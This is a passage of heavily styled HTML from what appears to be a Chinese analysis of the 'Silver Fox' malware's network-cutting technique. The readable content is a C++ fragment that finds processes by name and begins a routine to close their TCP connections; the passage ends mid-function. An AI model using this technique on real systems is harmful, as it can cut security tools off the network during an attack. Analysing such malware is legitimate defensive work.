Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">do</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">processName </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">==</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">szExeFile</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">push_back</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">th32ProcessID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span><span leaf="">wprintf</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">L&#34;[+] Found process: </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%s</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> (PID: </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">%lu</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;SpecialCharTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">\n</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;StringTok&#39;;color: #4070A0;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&#34;, pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">szExeFile, pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">.</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">th32ProcessID</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">while</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Process32NextW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">));</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">void</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CloseTcpConnectionsByPid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD size </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PMIB_TCPTABLE2 tcpTable </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span 